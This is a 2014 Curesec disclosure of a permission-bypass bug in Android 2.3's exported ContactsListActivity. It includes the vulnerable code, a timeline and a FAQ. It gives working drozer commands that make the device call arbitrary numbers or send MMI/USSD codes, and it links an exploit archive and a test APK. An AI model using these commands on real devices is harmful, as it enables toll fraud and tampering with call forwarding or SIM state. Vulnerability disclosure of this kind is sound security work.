CVE-2014-N/A com.android.contacts

CVE-2014-N/A com.android.contacts

Date: 2014-07-04 11:46:39

Introduction

This bug is similar to CVE-2013-6272 but is only exploitable on older Android versions. The bug exists in the component com.android.contacts.

Credits

Authors: Marco Lux, Pedro Umbelino
Email: security@curesec.com

Affectect Versions:

Version SDK Affected
2.3.3 10 Vulnerable
2.3.6 10 Vulnerable
3.0 11 Not Vulnerable
3.2 13 Not Vulnerable
4.0 14 Not Vulnerable
4.0.3 15 Not Vulnerable

This bug is not related to CVE-2013-6272 but has the same result. Reading the source code it probably exists at least from version 1.5. However we have only tested with SDK 10.

The Bug was corrected in version 3.0, SDK 11. Still, we would be interested in feedback by people testing the supplied exploitation techniques with their testdevices.

The bug is located in src/com/android/contacts/ContactsListActivity.java. Like in CVE-2013-6272, this activity is exported when it probably should not.

When this activity is created it parses the Intent for which it has been called:

... } else if (Intents.SEARCH_SUGGESTION_DIAL_NUMBER_CLICKED.equals(action)) { Intent newIntent = new Intent(Intent.ACTION_CALL_PRIVILEGED, intent.getData()); startActivity(newIntent); finish(); return; } ...

This basically means we can fool the activity into thinking we clicked on the dial number of a search suggestion and make it call any number we want since the number comes from intent.getData(). This also works for MMI and USSD codes (those that would normally require the user to press the SEND button after the code, android secret codes don't work nor *#06# to see the IMEI for example).

In conclusion this bug can be exploited as CVE-2013-6272, but it has a different codebase.

Exploitation

For the audience to play, test and execute the vulnerability we provide the following tools:

CRT-Kolme

You can download “Curesec Research Team – Kolme (Callmeh)” at

https://curesec.com/data/CRT-Kolme.apk

Source Code: https://curesec.com/data/CRT-Kolme.7z

After installation just click on the Curesec Logo and the testscreen will appear:


thumbnail


Choose the SDK you want to test. If your phone is vulnerable, it will call the number 31337:


thumbnail


Exploits for drozer

#unpack exploits to drozer modules directory tar xjf dz_exploits.tar.bz2 -C drozer/modules # forward tcp and connect to drozer adb forward tcp:31415 tcp:31415 drozer console connect #this conducts a phone call to the specified number dz> run curesec.exploit.callme2 -t #send code to the device for instance dz> run curesec.exploit.callme2 -c


thumbnail


Drozer Commandline Foo

Call any number:

#Call any number! run app.activity.start --component com.android.contacts com.android.contacts.ContactsListActivity --action android.provider.Contacts.SEARCH_SUGGESTION_DIAL_NUMBER_CLICKED --data-uri tel:31337

In order to make the codes work, you can use the following command:

run app.activity.start --component com.android.contacts com.android.contacts.ContactsListActivity --action android.provider.Contacts.SEARCH_SUGGESTION_DIAL_NUMBER_CLICKED --data-uri tel:%2343%23

The usual # symbol for the MMI codes has to be replaced by %23 to work properly.

FAQ

1. Why is this a bug?

Android normally has to grant permission so that your applications can conduct actions. If your installed application does not own the right to do a phone call, the Android OS should throw a permission denied.

However this bug is circumventing the situation and allows any malicous app to do a phone call, send mmi or ussd codes or hangup an ongoing call.

2. Is there an app to test this issue on my phone?

You can use the APK we published. You will find details in the next sections.

3. How would an attacker abuse this?

This bug can be abused by a malicious application. Take a simple game which is coming with this code. The game wont ask you for extra permissions to do a phone call to a toll number, however it is able to do it.

This is normally not possible without giving the app this special permission. But not only might it be disturbing or expensive for someone to call a toll number or getting ongoing calls hung up. It is also possible to send USSD or MMI codes.

The list of USSD/MMI codes is long and there are several quite powerful ones like changing the flow of phone calls(forwarding), blocking your simcard, enable or disable caller anonymisation and so on.

Please note that curesec GmbH is not responsible for any damage your device might suffer while you try to execute such codes.

4. Are tools which revoke permissions from apps blocking this attack?

No. As the app does not have the permission but is abusing a bug, such apps cannot easily protect you from this without the knowledge that this bug exists in another class on the system.

5. How can I contact you?

security@curesec.com

Timeline

Date Comment Sender
10/24/2013 Initial Report of CVE-2013-6272 by Curesec Curesec
10/24/2013 Forwarded to the dedicated Team by Google Google
11/11/2013 Engineers working on the issue Google
17/01/2014 Engineers still working on the issue Google
23/01/2014 Issue is reported to be patched and integrated the next two weeks. Google
6/5/2014 Request if the issue is resolved now. No response yet. Curesec
4/7/2014 Public Disclosure of CVE-2013-6272 and CVE-2014-N/A Curesec

Downloads

CRT-Kolme.apk (test application)
CRT-Kolme.7z (source code)
dz_exploit (exploit archive cve-2013-6271, cve-2013-6272 and cve-2014-n/a)